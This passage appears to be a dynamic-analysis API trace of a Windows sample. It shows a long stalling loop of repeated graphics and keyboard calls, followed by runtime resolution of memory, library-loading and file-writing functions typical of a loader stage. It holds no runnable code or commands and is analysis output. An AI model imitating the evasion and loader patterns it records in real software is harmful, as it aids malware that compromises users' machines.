[0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.348] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetKeyState (nVirtKey=1) returned 0 [0181.349] GetStretchBltMode (hdc=0x1) returned 0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetKeyState (nVirtKey=1) returned 0 [0181.349] GetStretchBltMode (hdc=0x1) returned 0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.349] GetStockObject (i=789644) returned 0x0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.350] GetKeyState (nVirtKey=1) returned 0 [0181.350] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.351] GetStretchBltMode (hdc=0x1) returned 0 [0181.351] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.352] GetKeyState (nVirtKey=1) returned 0 [0181.352] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.353] GetKeyState (nVirtKey=1) returned 0 [0181.353] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.354] GetStretchBltMode (hdc=0x1) returned 0 [0181.354] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.355] GetKeyState (nVirtKey=1) returned 0 [0181.355] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.356] GetStretchBltMode (hdc=0x1) returned 0 [0181.356] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.357] GetKeyState (nVirtKey=1) returned 0 [0181.357] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.358] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.358] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.358] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.358] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.358] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.358] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.358] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.358] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.358] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.358] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.358] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.358] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.358] GetStretchBltMode (hdc=0x1) returned 0 [0181.358] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.359] GetStretchBltMode (hdc=0x1) returned 0 [0181.359] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.360] GetKeyState (nVirtKey=1) returned 0 [0181.360] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.361] GetStretchBltMode (hdc=0x1) returned 0 [0181.361] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.362] GetKeyState (nVirtKey=1) returned 0 [0181.362] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.363] GetKeyState (nVirtKey=1) returned 0 [0181.363] GetStretchBltMode (hdc=0x1) returned 0 [0181.365] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathA") returned 0x76d6276c [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0181.366] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0181.366] 